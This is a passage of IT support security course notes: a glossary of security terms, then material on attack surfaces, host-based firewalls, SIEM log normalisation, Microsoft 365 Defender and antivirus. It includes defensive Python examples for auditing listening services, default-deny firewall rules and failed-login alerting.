authentication of data along with privacy from third parties relying upon asymmetric
encryption to achieve this

Phishing attack: It usually occurs when a malicious email is sent to a victim disguised as
something legitimate

Physical tokens: They take a few different forms, such as a USB device with a secret token on
it, a standalone device which generates a token, or even a simple key used with a traditional
lock

Ping flood: It sends tons of ping packets to a system. If a computer can't keep up with this,
then it's prone to being overwhelmed and taken down

PKI system: A system that defines the creation, storage and distribution of digital certificates

Pseudo-random: Something that isn't truly random

Public key authentication: A key pair is generated by the user who wants to authenticate

Public key signatures: Digital signature generated by composing the message and
combining it with the private key

RA (Registration Authority): It is responsible for verifying the identities of any entities
requesting certificates to be signed and stored with the CA

Rainbow table attacks: To trade computational power for disk space by pre-computing the
hashes and storing them in a table

Rainbow tables: A pre-computed table of password candidates and their corresponding
hashes (stored as hash chains so it is far smaller than a full lookup table); salting defeats
them, since every distinct salt would need its own table

Random numbers: A very important concept in encryption because it avoids some kind of
pattern that an adversary can discover through close observation and analysis of encrypted
messages over time

Ransomware: A type of attack that holds your data or system hostage until you pay some
sort of ransom

RC4 (Rivest Cipher 4): A symmetric stream cipher that gained widespread adoption because
of its simplicity and speed; it has known keystream biases and is now prohibited in TLS
(RFC 7465)

Remote attestation: The idea of a system authenticating its software and hardware
configuration to a remote system

Remote Authentication Dial-in User Service (RADIUS): A protocol that provides AAA
services for users on a network

Risk mitigation: Understanding the risks your systems face, take measures to reduce those
risks, and monitor them

Risk: The possibility of suffering a loss in the event of an attack on the system

Rogue Access Point (AP) Attack: An access point that is installed on the network without the
network administrator's knowledge

Root certificate authority: They are self signed because they are the start of the chain of
trust, so there's no higher authority that can sign on their behalf

Rootkit: A collection of software or tools that gives an attacker administrator-level ("root")
control of a system while hiding its own presence from the normal administrative tools

RSA: One of the first practical asymmetric cryptography systems to be developed, named for
the initials of the three co-inventors: Ron Rivest, Adi Shamir and Leonard Adleman

Screen lock: A security feature that helps prevent unwanted access by creating an action you
have to do to gain entry

Secure channel: It is provided by IPsec, which provides confidentiality, integrity, and
authentication of data being passed

Secure element: It's a tamper resistant chip often embedded in the microprocessor or
integrated into the mainboard of a mobile device

Secure Shell (SSH): A secure network protocol that uses encryption to allow access to a
network service over unsecured networks

Security keys: Small embedded cryptoprocessors, that have secure storage of asymmetric
keys and additional slots to run embedded code

Security through obscurity: The principle that if no one knows what algorithm is being used
or general security practices, then one is safe from attackers

Self-signed certificate: This certificate has been signed by the same entity that issued the
certificate

Serial number: A unique identifier for their certificate assigned by the CA which allows the CA
to manage and identify individual certificates

Session hijacking (cookie hijacking): A common meddler in the middle attack

Session key: The shared symmetric encryption key using TLS sessions to encrypt data being
sent back and forth

SHA1: It is part of the secure hash algorithm suite of functions, designed by the NSA and
published in 1995; practical collisions were demonstrated in 2017, so it is no longer
acceptable for signatures

Shannon's maxim: It states that the system should remain secure, even if your adversary
knows exactly what kind of encryption systems you're employing, as long as your keys remain
secure

Single Sign-on (SSO): An authentication concept that allows users to authenticate once to be
granted access to a lot of different services and applications

Social engineering: An attack method that relies heavily on interactions with humans instead
of computers

Spear phishing: Phishing that targets individual or group - the fake emails may contain some
personal information like your name, or the names of friends or family

Spoofing: When a source is masquerading around as something else

Spyware: The type of malware that's meant to spy on you

SQL Injection Attack: An injection attack in which attacker-controlled input is embedded in a
SQL query, allowing the attacker to read or modify the entire database behind the website

SSL 3.0: The latest revision of SSL that was deprecated in 2015

SSL/TLS Client Certificate: Certificates that are bound to clients and are used to
authenticate the client to the server, allowing access control to a SSL/TLS service

SSL/TLS Server Certificate: A certificate that a web server presents to a client as part of the
initial secure setup of an SSL, TLS connection

StartTLS: It permits a client to communicate using LDAP v3 over TLS

Steganography: The practice of hiding information from observers, but not encoding it

Stream ciphers: It takes a stream of input and encrypts the stream one character or one digit
at a time, outputting one encrypted character or digit at a time

Subject Public Key Info: These two subfields define the algorithm of the public key along
with the public key itself

Subject: This field contains identifying information about the entity the certificate was issued
to

Substitution cipher: An encryption mechanism that replaces parts of your plaintext with
ciphertext

Symmetric key algorithm: Encryption algorithms that use the same key to encrypt and
decrypt messages

SYN flood: The server is bombarded with SYN packets whose handshakes are never
completed, exhausting its connection table

TACACS+: It is a device access AAA system that manages who has access to your network
devices and what they do on them

Tailgating: Gaining access into a restricted area or building by following a real employee in

Threat: The possibility of danger that could exploit a vulnerability

Ticket granting service (TGS): It decrypts the Ticket Granting Ticket using the Ticket
Granting Service secret key, which provides the Ticket Granting Service with the client Ticket
Granting Service session key

Time-based token (TOTP): A One-Time-Password that's rotated periodically

TLS 1.2 with AES GCM: AES-GCM is a specific mode of operation for the AES block cipher that
essentially turns it into a stream cipher and also authenticates the data

TLS 1.2: The recommended revision of SSL/TLS at the time of the course; TLS 1.3 (2018) is
now the current version, with TLS 1.2 still acceptable and TLS 1.0/1.1 deprecated

TLS Handshake: A mechanism to initially establish a channel for an application to
communicate with a service

TPM (Trusted Platform Module): This is a hardware device that's typically integrated into
the hardware of a computer, that's a dedicated crypto processor

Transport mode: One of the two modes of operations supported by IPsec. When used, only
the payload of the IP packet is encrypted, leaving the IP headers untouched

Trojan: Malware that disguises itself as one thing but does something else

Trusted execution environment (TEE): It provides a full-blown isolated execution
environment that runs alongside the main OS

Tunnel mode: One of the two modes of operations supported by IPsec. When used, the entire
IP packet, header, payload, and all, is encrypted and encapsulated inside a new IP packet
with new headers

Tunnel: It is provided by L2TP, which permits the passing of unmodified packets from one
network to another

U

U2F (Universal 2nd Factor): It's a standard developed jointly by Google, Yubico and NXP
Semiconductors that incorporates a challenge-response mechanism, along with public key
cryptography to implement a more secure and more convenient second-factor
authentication solution

Unbind: It closes the connection to the LDAP server

Username and password authentication: Can be used in conjunction with certificate
authentication, providing additional layers of security

Validity: This field contains two subfields, Not Before and Not After, which define the dates
when the certificate is valid for

Version: Which version of the X.509 standard the certificate adheres to

Viruses: The best known type of malware; code that attaches itself to programs or files and
spreads when they are run or copied

VPN (Virtual Private Network): A secure method of connecting a device to a private
network over the internet

Vulnerability: A flaw in the system that could be exploited to compromise the system

Web of trust: It is where individuals instead of certificate authorities sign other individuals'
public keys

Worms: They are similar to viruses except that instead of having to attach themselves onto
something to spread, worms can live on their own and spread through channels like the
network

X.509 standard: It is what defines the format of digital certificates, as well as a certificate
revocation list or CRL

XTACACS: It stands for Extended TACACS, which was a Cisco proprietary extension on top
of TACACS

Z
0-Day Vulnerability (Zero Day): A vulnerability that is not known to the software developer
or vendor, but is known to an attacker

The potential for these unknown flaws is something you should think about when 
looking to secure your company's systems and networks. 
Even though it's an unknown risk, 
it can still be handled by taking measures to restrict and control access to systems. 
Our end goal overall is risk reduction. 
Two important terms to know when talking about security risks are attack vectors 
and attack surfaces. 
An attack vector is a method or mechanism by which an attacker or 
malware gains access to a network or system. 
Some attack vectors are email attachments, network protocols or 
services, network interfaces and user input. 
These are different approaches or paths that an attacker could use to compromise 
the system, if they're able to exploit it. 
An attack surface is the sum of all the different attack vectors in a given
system.
Think of this as the combination of all possible ways 
an attacker could interact with our system regardless of known vulnerabilities. 
It's not possible to know of all vulnerabilities in the system, so 
make sure to think of all avenues that an outside actor could interact with our 
systems as a potential attack surface. 
The main takeaway here is to keep our attack surfaces as small as possible. 
This reduces the chances of an attacker discovering an unknown flaw and 
compromising our systems. 
There are lots of approaches you can use as an IT support specialist to reduce
attack surfaces; all of them boil down to simplifying systems and services.
The less complex something is, the less likely there will be undetected flaws. 
So make sure to disable any extra services or protocols, 
if they're not totally necessary, then get them out of there. 
Every additional service that's running represents additional attack surface that
could have an undiscovered vulnerability.
That vulnerability could be exploited and lead to compromise. 
This concept also applies to access ACLs:
only allow access when totally necessary.
So for example, it's probably not necessary for employees to be able to 
access printers directly from outside of the local network. 
You can just adjust firewall rules to prevent that type of access. 
Another way to keep things simple is to reduce your software deployments. 
Instead of having five different software solutions to accomplish five separate 
tasks, replace them with one unified solution, if you can. 
That one solution should require less complex code which 
reduces the number of potential vulnerabilities. 
You should also make sure to disable unnecessary or 
unused components of software and systems deployed. 
By disabling features not in use,
you're reducing the attack surface even more.
You're not only reducing the number of ways an attacker can get in, but 
you're also minimizing the amount of code that's active.
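The first step in "get them out of there" is knowing which services are actually listening. The script below is an added example, not part of the course material: it parses the output of the Linux `ss -lntp` command and reports every TCP listener that is reachable from the network and is not on an allowlist of services the host is meant to offer. The `ss` output, host names and allowlist are constructed for the example.

```python
"""Attack-surface audit of listening sockets.

Added example (not part of the course material): parse the output of
`ss -lntp` on a Linux host and report every TCP listener that is reachable
from the network and is not on an allowlist of services the machine is
meant to offer.  The sample output below is constructed for the example,
not captured from a real host.
"""
import re
from dataclasses import dataclass

# Constructed sample of `ss -lntp` output from a hypothetical host.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       4096    127.0.0.1:631        0.0.0.0:*          users:(("cupsd",pid=600,fd=7))
LISTEN  0       128     [::]:22              [::]:*             users:(("sshd",pid=812,fd=4))
LISTEN  0       511     *:80                 *:*                users:(("nginx",pid=900,fd=6))
LISTEN  0       128     0.0.0.0:5900         0.0.0.0:*          users:(("x11vnc",pid=1337,fd=5))
LISTEN  0       80      127.0.0.1:3306       0.0.0.0:*          users:(("mysqld",pid=455,fd=21))
"""

# Sockets bound to loopback can only be reached from the host itself.
LOOPBACK_HOSTS = {"127.0.0.1", "[::1]", "::1"}
_PROCESS_RE = re.compile(r'\("([^"]+)"')   # process name inside users:(("name",pid=...))


@dataclass(frozen=True)
class Listener:
    host: str
    port: int
    process: str

    @property
    def exposed(self) -> bool:
        """True when hosts other than this one can connect to the socket."""
        return self.host not in LOOPBACK_HOSTS


def parse_ss(output: str) -> list[Listener]:
    """Turn `ss -lntp` text into Listener records (header row skipped)."""
    listeners = []
    for line in output.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        host, port = fields[3].rsplit(":", 1)     # "[::]:22" -> ("[::]", "22")
        match = _PROCESS_RE.search(line)
        listeners.append(Listener(host, int(port), match.group(1) if match else "?"))
    return listeners


def unexpected_listeners(output: str, allowed: set[str]) -> list[Listener]:
    """Network-reachable listeners whose process is not on the allowlist.

    Each one is a service to disable, or at least firewall off, unless it is
    genuinely required on this host.
    """
    return [l for l in parse_ss(output) if l.exposed and l.process not in allowed]


if __name__ == "__main__":
    # Hypothetical allowlist: this box is supposed to offer SSH and HTTP only.
    for l in unexpected_listeners(SAMPLE_SS_OUTPUT, {"sshd", "nginx"}):
        print(f"unexpected exposed service: {l.process} on {l.host}:{l.port}")
```

On a real host you would feed it `subprocess.run(["ss", "-lntp"], capture_output=True, text=True).stdout` (run as root so process names are populated). Note that loopback-only listeners such as the database above are excluded from the report but still count as attack surface for a local attacker.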

We briefly mentioned host-based firewalls when we
talked about network monitoring
and intrusion detection systems.
Host-based firewalls are important 
to creating multiple layers of security. 
They protect individual hosts from being 
compromised when they're used in untrusted, 
and potentially malicious environments. 
They also protect individual hosts from 
potentially compromised peers inside a trusted network. 
Our network-based firewall has a duty to protect 
our internal network by 
filtering traffic in and out of it. 
While the host-based firewall on each individual host, 
protects that one machine. 
Like our network-based firewall, 
we'd still want to start with an implicit deny rule, 
then we'd selectively enable 
specific services and ports that'll be used. 
This lets us start with a secure default, 
and then only permits traffic that we know and trust. 
You can think of this as starting with 
a perfectly secure firewall configuration 
and then poking holes in it for 
the specific traffic we require. 
This may look very different from 
your network firewall configuration, 
since it's unlikely that your employees would need 
remote SSH access to their laptops, for example. 
Remember that to secure systems, 
you need to minimize attack surfaces or exposure. 
A host-based firewall plays a big part 
in reducing what's accessible to an outside attacker. 
It provides flexibility while 
only permitting connections to 
selective services on a given host 
from specific networks or IP ranges. 
This ability to restrict
connections from certain origins
is usually used to implement
a highly secure host or network.
From there, access to 
critical or sensitive systems 
or infrastructure is permitted. 
These are called bastion hosts or networks, 
and are specifically hardened and 
minimized to reduce what's permitted to run on them. 
Bastion hosts are usually exposed to the Internet, 
so you should pay special attention to hardening and 
locking them down to reduce the chances of compromise. 
But they can also be used as a gateway or access portal 
into more sensitive services like 
core authentication servers or domain controllers. 
This would let you implement
more secure authentication mechanisms and
ACLs on the bastion hosts without
making it inconvenient for your entire company.
Monitoring and logging can be 
prioritized for these hosts more easily. 
Typically, these hosts or networks would 
also have severely limited network connectivity. 
It's usually just to the secure zone 
that they're designed to protect and not much else. 
Applications that are allowed to be 
installed and run on these hosts, 
would also be restricted to those that are strictly 
necessary since these machines have one specific purpose. 
Part of the host-based firewall rules will likely also
provide ACLs that allow access from the VPN subnet.
It's good practice to keep the network that VPN clients 
connect into separate using both subnetting and VLANs. 
This gives you more flexibility to 
enforce security on these VPN clients. 
It also lets you build additional layers of defenses. 
While a VPN host should be protected using other means, 
it's still a host that's operating 
in a potentially malicious environment. 
This host is then initiating 
a remote connection into your trusted internal network. 
These hosts represent another potential vector 
of attack and compromise. 
Your ability to separately monitor traffic 
coming and going from them is super useful. 
There's an important thing for you to consider 
when it comes to host-based firewalls, 
especially for clients systems like laptops. 
If the users of the system
have administrative rights, then
they have the ability to change
firewall rules and configurations.
This is something you should keep in 
mind and make sure to monitor with logging. 
If management tools allow it, 
you should also prevent 
the disabling of the host-based firewall. 
This can be done with Microsoft Windows machines when 
administered using Active Directory as an example.
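The "start from implicit deny, then poke holes" policy described above, as an added example that is not part of the course: a small Python model of a host-based firewall for a hypothetical internal server that allows SSH only from the VPN client subnet and a bastion host, allows HTTPS from anywhere, and denies everything else because no rule matches it. The same policy is then rendered as an nftables ruleset with `policy drop`. The subnets, bastion address and services are assumptions for the example.

```python
"""Host-based firewall policy with implicit deny.

Added example, not course material: an evaluator for a default-deny policy
plus a renderer that emits the equivalent nftables ruleset.  The networks
and hosts below are hypothetical.
"""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class AllowRule:
    """One hole poked in the default-deny policy."""
    proto: str                  # "tcp" or "udp"
    dport: int
    source: str = "0.0.0.0/0"   # CIDR of permitted clients; default is any IPv4


# Hypothetical policy for an internal server: SSH only from the VPN client
# subnet and the bastion host, HTTPS from anywhere.  Anything not listed is
# denied because evaluate() falls through to "deny".
VPN_CLIENTS = "10.8.0.0/24"
BASTION = "10.0.1.5/32"
POLICY = [
    AllowRule("tcp", 22, VPN_CLIENTS),
    AllowRule("tcp", 22, BASTION),
    AllowRule("tcp", 443),
]


def evaluate(policy: list[AllowRule], proto: str, src: str, dport: int) -> str:
    """Return 'allow' if some rule matches the inbound connection, else 'deny'."""
    addr = ipaddress.ip_address(src)
    for rule in policy:
        if rule.proto != proto or rule.dport != dport:
            continue
        # Membership is False for mismatched address families, so an IPv6
        # client never matches an IPv4-only rule.
        if addr in ipaddress.ip_network(rule.source, strict=False):
            return "allow"
    return "deny"   # implicit deny: nothing matched


def render_nftables(policy: list[AllowRule]) -> str:
    """Render the same policy as an nftables input chain with policy drop."""
    lines = [
        "table inet filter {",
        "    chain input {",
        "        type filter hook input priority 0; policy drop;",
        '        iif "lo" accept',
        "        ct state established,related accept",
    ]
    for rule in policy:
        net = ipaddress.ip_network(rule.source, strict=False)
        family = "ip" if net.version == 4 else "ip6"
        saddr = "" if net.prefixlen == 0 else f"{family} saddr {net} "
        lines.append(f"        {saddr}{rule.proto} dport {rule.dport} accept")
    lines += ["    }", "}"]
    return "\n".join(lines)


if __name__ == "__main__":
    for proto, src, port in [("tcp", "10.8.0.23", 22), ("tcp", "192.0.2.10", 22),
                             ("tcp", "198.51.100.7", 443), ("tcp", "10.8.0.23", 5900)]:
        print(f"{proto} {src} -> :{port}: {evaluate(POLICY, proto, src, port)}")
    print(render_nftables(POLICY))
```

The rendered ruleset can be loaded with `nft -f` on a Linux host; the `established,related` rule is what lets replies to the host's own outbound connections back in, which the model above does not track. Keeping the allow list in data like this also makes it easy to diff a laptop's effective rules against the intended policy when users with administrative rights could have changed them.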

A critical part of any security architecture is logging and alerting.
It wouldn't do much good to have all these defenses in place
if we have no idea whether they're working or not. We need visibility into the security
systems in place to see what kind of traffic they're seeing.
We also need to have the visibility into the logs of all of our infrastructure 
devices and equipment that we manage but it's not enough to just have logs. 
We also need ways to safeguard logs and make them easy to analyze and review. 
If there's a dedicated security team at your company, 
they would be performing this analysis but 
at a smaller company this responsibility would likely fall to the IT team. 
So let's make sure you're prepared with the skills you might need for 
incident investigation. 
Many investigative techniques can also be applied to troubleshooting. 
All systems and services running on hosts will create logs of some kind with 
different levels of detail. 
It depends on what its logging and what events it's configured to log. 
So an authentication server would log every authentication attempt whether it's 
successful or not. 
A firewall would log traffic that matches rules with details like source and 
destination addresses and ports being used. 
All this log information gives us details about the traffic and 
activity that's happening on our network and systems. 
This can be used to detect compromise or attempts to attack the system. 
When there are a large number of systems located around your network, 
each with their own log format, 
it can be challenging to make meaningful sense of all this data. 
This is where security information and event management systems or SIEMS come in. 
A SIEM can be thought of as a centralized log server with some extra analysis
features too.
You can think of SIEM as a form of centralized logging for 
security administration purposes. 
A SIEM system gets logs from a bunch of other systems. 
It consolidates the logs from all different places and 
places it in one centralized location. 
This makes handling logs a lot easier. 
As an IT support specialist, an important step you'll take in log
analysis is normalization.
This is the process of taking log data in different formats and converting it into 
a standardized format that's consistent with a defined log structure. 
As an IT support specialist you might configure normalization for 
your log sources. 
For example, log entries from our firewall may have a timestamp using a year, 
month and day format. 
While logs from our client machines may use day, month, year format. 
To normalize this data, you choose one standard date format then you 
define what the fields are for the log types that need to be converted. 
When logs are received from these machines, the log entries 
are converted into the standard that we defined and stored by the logging server. 
This lets you analyze and compare log data between different log types and 
systems in a much easier fashion. 
So what type of information should you be logging? 
Well that's a great question. 
If you log too much info, it's difficult to analyze the data and 
find useful information plus storage requirements for 
saving the logs become expensive very quickly. 
But if you log too little then the information won't provide any useful 
insights into your systems and network. 
Finding that middle ground can be difficult. 
It will vary depending on the unique characteristics of the systems being 
monitored and the type of activity on the network. 
No matter what events are logged, all of them should have information that will 
help understand what happened and reconstruct the events. 
There are lots of important fields to capture in log entries, like the timestamp, 
the event or error code, the service or application being logged, 
the user or system account associated with the event and 
the devices involved in the event. 
Timestamps are super important to understanding when an event occurred. 
Fields like source and 
destination addresses will tell us who was talking to whom. 
For application logs you can grab useful information from the logged 
in user associated with the event and from what client they used. 
On top of the analysis assistance it provides, a centralized log server also has 
security benefits. 
By maintaining logs on a dedicated system, 
it's easier to secure the system from attack. 
Logs are usually targeted by attackers after a breach so 
that they can cover their tracks. 
By having critical systems send logs to remote logging server that's locked down, 
the details of a breach should still be logged. 
A forensics team will be able to reconstruct the events that led to 
the compromise. 
Once we have logging configured and 
the relevant events recorded on a centralized log server, what do we do with 
all the data? How you analyze log details depends on what you're trying to achieve. 
Typically when you look at aggregated logs as an IT support specialist, 
you should pay attention to patterns and connections between traffic. 
So if you're seeing a large percentage of Windows hosts 
all connecting to a specific address outside your 
network, that might be worth investigating. It could signal a malware infection. 
Once logs are centralized and 
standardized you can write automated alerting based on rules. 
Maybe you'll want to define an alert rule for repeated unsuccessful 
attempts to authenticate to a critical authentication server. 
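The two steps just described, normalization of log sources with different timestamp formats and an alert rule for repeated authentication failures, as one added example. This is not code from the course or from any SIEM product; the log lines, hosts and addresses are constructed samples, and the example assumes both sources log in UTC.

```python
"""Added example, not from the course: normalise log lines from two sources
with different timestamp formats into one record shape, then run the
"repeated failed authentication" alert rule over the result. Every log line
below is a constructed sample; the hosts and addresses are fictional, and
both sources are assumed to log in UTC."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# The firewall writes year-month-day; the auth server writes day/month/year.
FIREWALL_LOG = """\
2024-03-05 10:15:02 ALLOW src=10.0.0.12 dst=93.184.216.34 dport=443
2024-03-05 10:15:09 DENY src=10.0.0.12 dst=198.51.100.7 dport=445
"""
AUTH_LOG = """\
05/03/2024 10:14:50 sshd[812]: Failed password for root from 203.0.113.9 port 51022
05/03/2024 10:14:53 sshd[812]: Failed password for root from 203.0.113.9 port 51030
05/03/2024 10:14:57 sshd[812]: Failed password for admin from 203.0.113.9 port 51041
05/03/2024 10:15:01 sshd[812]: Failed password for root from 203.0.113.9 port 51055
05/03/2024 10:15:04 sshd[812]: Failed password for root from 203.0.113.9 port 51060
05/03/2024 10:15:30 sshd[812]: Accepted password for alice from 10.0.0.12 port 40010
"""

FW_RE = re.compile(r"^(\S+ \S+) (ALLOW|DENY) src=(\S+) dst=(\S+) dport=(\d+)$")
AUTH_RE = re.compile(r"^(\S+ \S+) sshd\[\d+\]: (Failed|Accepted) password for (\S+) from (\S+) port \d+$")


def _record(ts, source, event, src, dst=None, dport=None, user=None):
    """The one standard record shape every source is converted into."""
    return {"ts": ts, "source": source, "event": event, "src": src,
            "dst": dst, "dport": dport, "user": user}


def normalize_firewall(text):
    out = []
    for line in text.splitlines():
        m = FW_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
            out.append(_record(ts, "firewall", m.group(2).lower(), m.group(3), m.group(4), int(m.group(5))))
    return out


def normalize_auth(text):
    out = []
    for line in text.splitlines():
        m = AUTH_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%d/%m/%Y %H:%M:%S").replace(tzinfo=timezone.utc)
            event = "auth_failure" if m.group(2) == "Failed" else "auth_success"
            out.append(_record(ts, "sshd", event, m.group(4), user=m.group(3)))
    return out


def failed_auth_alerts(records, threshold=5, window=timedelta(minutes=1)):
    """Alert on any source address with >= threshold auth failures inside a
    sliding window. Returns (src, window start as ISO 8601, failure count)."""
    failures = defaultdict(list)
    for r in sorted(records, key=lambda r: r["ts"]):
        if r["event"] == "auth_failure":
            failures[r["src"]].append(r["ts"])
    alerts = []
    for src, times in failures.items():  # times are already in order
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts.append((src, times[start].isoformat(), end - start + 1))
                break
    return alerts


def run():
    records = normalize_firewall(FIREWALL_LOG) + normalize_auth(AUTH_LOG)
    return records, failed_auth_alerts(records)


if __name__ == "__main__":
    records, alerts = run()
    for r in sorted(records, key=lambda r: r["ts"]):  # one timeline across both sources
        print(r["ts"].isoformat(), r["source"], r["event"], r["src"], r["user"] or "")
    for src, since, count in alerts:
        print(f"ALERT: {count} failed logins from {src} since {since}")
```

Because every record ends up with a timezone-aware timestamp in the same shape, the firewall DENY at 10:15:09 and the SSH failures a few seconds earlier sort onto one timeline, which is exactly what the normalization step buys you when you investigate.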
Lots of SIEM solutions also offer handy dashboards to help analysts visualize 
this data. 
Having data in a visual format can potentially provide more insight. 
You can also write some of your own monitoring and alert systems. 
Now it doesn't matter if you're using a SIEM solution or writing your own. 
It can be useful to break down things like commonly used protocols in the network. 
Quickly see the top talkers in the network and 
view reported errors over time to reveal patterns. 
Another important component to logging to keep in mind as an IT support specialist 
is retention. 
Your log storage needs will vary based on the number of systems being logged, 
the amount of detail logged, and the rate at which logs are created. 
How long you want or need to keep logs around will also really influence 
the storage requirements for a log server. 
Some examples of logging servers and SIEM solutions are the open source rsyslog, 
Splunk Enterprise Security, IBM Security QRadar and RSA Security Analytics.

Supplemental Reading for Logging and Auditing
There are a variety of logging server and SIEM solutions you can explore.

If you're interested in open source solutions, check out rsyslog here.

If you're interested in enterprise solutions, check out Splunk Enterprise Security here
and IBM Security Qradar here.

Windows Defender Guide

Microsoft 365 Defender
Previously, you learned about system hardening and critical elements in security architecture. In this
reading, you will learn how Microsoft 365 Defender can be used within an organization for expanded
security services and tools. You will also learn about User Account Control (UAC) and its importance in
endpoint security.
Microsoft 365 Defender services

Preventing threats across an enterprise environment can be challenging for IT Support professionals.
Microsoft 365 Defender can help to simplify this responsibility. Defender provides enterprise-wide security
through an integrated suite of tools. It offers tools to prevent attacks, detect threats, investigate security
breaches, and coordinate effective response strategies. The Defender portal also offers an action center for
monitoring incidents and alerts, as well as for threat hunting and analytics. 

Microsoft 365 Defender protection and services include:

 Defender for Endpoint: Protects network endpoints including servers, workstations, mobile
devices, and IoT devices. Provides preventative safeguards, breach detections, automated
analyses, and threat response services. 
 Defender Vulnerability Management: Protects assets including, hardware, software, licenses,
networks, and data. Provides asset inventory, vulnerability discovery, configuration assessment,
risk-based prioritization, and remediation tools.
 Defender for Office 365: Protects Microsoft 365 (formerly Office 365), including Exchange,
Outlook, files, and attachments. Guards against malicious threats entering from email messages,
links (URLs), and collaboration tools.
 Defender for Identity: Protects user identities and credentials. Detects, identifies, and
investigates advanced threats, compromised identities, and malicious actions performed using
stolen user identities or by internal threats. 
 Azure Active Directory Identity Protection: Protects cloud-based identities in Azure by
automating detection and resolutions for identity risks.
 Defender for Cloud Apps: Protects cloud applications by providing deep visibility searches,
robust data controls, and advanced threat protection.

Using Microsoft 365 Defender

As an IT Support professional in an organization, you might use Microsoft 365 Defender to monitor your
enterprise’s IT security. You can customize the Defender portal Home page by job roles. Various security
cards can be selected to appear on the Home page for your role. For example, you might see cards for
monitoring: 

 Identities: Monitor user identities for suspicious or risky behaviors. 
 Data: Track user activity that is risky to data security.
 Devices: See alerts, breach activity, and other threats on devices connected to the organization’s
network.
 Apps: Observe how cloud apps are being used in your organization.
 Incidents: Review attacks through compiled comprehensive incident data.
 Alerts: View alerts compiled from across the Microsoft 365 suite.
 Advanced hunting: Scan for suspicious files, malware, and risky activities.
 Threat Analytics: View information about current cybersecurity threats.
 Secure score: Get a calculated score for your security configuration and recommendations on how
to improve your score.
 Learning hub: Easily access Microsoft 365 security tutorials and other learning materials.
 Reports: Obtain information to help you better protect your organization.
Microsoft 365 Defender aggregates and organizes this monitoring data to provide IT Support professionals
details on where attacks began, which malicious tactics were used, the scope of the attacks, and other
related incident information. 

Microsoft 365 Defender in action

The following are examples of how a cyberattack might penetrate and infect an enterprise network. For
each type of malicious attack, a potential Microsoft 365 Defender response follows, illustrating how the
security suite could respond: 

 A phishing attempt enters through email: An employee in an organization receives an email from
a business that appears to be legitimate, like a bank. The email might claim that there is a problem
with the employee’s account and that they must click on a given link to resolve the problem.
However, the phishing email actually contains a link to a malicious website that a cybercriminal
disguised to look like a real bank. If the employee clicks on the link to view the website, the site
requests that the user enter their account credentials or other sensitive information. This
information is then transmitted to the cybercriminal. Microsoft Defender for Office 365 detects
the emailed phishing scam by monitoring Exchange and Outlook. Both the employee and the IT
Support team are alerted about this attempted phishing attack.
 Malware enters through social media: An employee clicks on an enticing link posted on their
favorite social media app. The link triggers an automatic download of a malware file to the
employee’s laptop. Microsoft Defender for Endpoint monitors the employee’s laptop for
suspicious malware signatures. Upon detecting the malware, Defender for Endpoint alerts the
employee and the organization’s IT Support team about the malware and discloses its endpoint
location.
 A cybercriminal intercepts an employee’s work login credentials: An employee accesses their
work account using their laptop and an open Wi-Fi access point in a busy coffee shop. A
cybercriminal is in the same coffee shop to intercept and collect unprotected information flowing
through the open Wi-Fi access point. The cybercriminal obtains the employee’s user account
credentials and uses them to hijack the employee’s work account. The cybercriminal then begins a
malicious attack on the employer’s network.  Microsoft Defender for Identity can detect the
sudden change in activity on the employee’s user account. Defender for Identity alerts the
employee and the IT Support team about the compromised user identity.
 A virus enters a cloud drive through a file upload: An employee unknowingly uploads a file that
is infected with a virus to their work cloud storage drive. When the employee opens the file from
the cloud drive, the virus is activated and begins changing the security settings on the other files in
the employee's cloud drive. Microsoft Defender for Cloud Apps detects the unusual pattern of
activity and alerts the employee and IT Support team of the suspicious activity in the cloud
account.

User Account Control (UAC)

User Account Control (UAC) is the Windows mechanism that runs programs with standard user rights, even
when the logged-in user is an administrator, and prompts before a program is allowed to elevate. Combined
with giving end users standard accounts with limited rights and privileges, this configuration can prevent
users from installing unauthorized programs, changing system settings, tampering with the firewall, and more.
In order to perform these types of tasks, administrator credentials must be provided. For less restrictive
controls, UAC can let a user who holds local administrative privileges approve an elevation with a simple
consent prompt. For more restrictive controls, UAC can require administrator credentials to be entered for
each and every administrative change the user attempts to make, even for users who are administrators.

Resources for more information

To learn more about Microsoft Defender through the Microsoft learning portal, please visit:

 Microsoft Learn: Introduction to Microsoft 365 Defender - Microsoft’s self-paced course for
Microsoft 365 Defender
 Protect your organization with Microsoft 365 Defender - An interactive guide to Microsoft 365
Defender and how it detects security risks, investigates attacks, and prevents harmful activities. 
 Microsoft Defender for Endpoint - Gives an overview of product, services, architecture, and training
opportunities.
 Microsoft Defender Vulnerability Management - Provides information about the services and tools
available to find and fix vulnerabilities.
 Microsoft Defender for Office 365 - Lists included services and tools for various product levels, as
well as the types of threats it protects against. 
 Microsoft Defender for Identity - Offers product information, how-to guides, tutorials, and
reference information.
 Microsoft Defender for Cloud Apps - Provides product overview, quickstart reference guide,
tutorials, best practices, and additional resources.
 How User Account Control works - User Account Control (UAC) is a fundamental component of
Microsoft's overall security vision. UAC helps mitigate the impact of malware.

Anti malware defenses are a core part of any company's security model in this 
day and age. 
So, it's important as an IT support specialist to know what's out there. 
Today, the Internet is full of bots, viruses, worms and 
other automated attacks. 
Lots of unprotected systems would be compromised in a matter of minutes if 
directly connected to the Internet without any safeguards or protections in place, 
especially if they're missing critical system updates. 
While modern operating systems have reduced this threat vector by having basic 
firewalls enabled by default, 
there's still a huge amount of attack traffic on the Internet. 
Anti malware measures play a super important role in keeping this type of 
attack off your systems and helping to protect your users. 
Antivirus software has been around for a really long time. 
But some security experts question the value it can provide to a company, 
especially since more sophisticated malware and 
attacks have been spun up in recent years. 
Antivirus software is signature-based. 
This means that it has a database of signatures that identify known 
malware like the unique file hash of a malicious binary or 
the file associated with an infection. 
Or it could be the network traffic characteristics that malware uses to 
communicate with a command and control server. 
Antivirus software will monitor and analyze things like new files being 
created or being modified on the system in order to watch for 
any behavior that matches a known malware signature. 
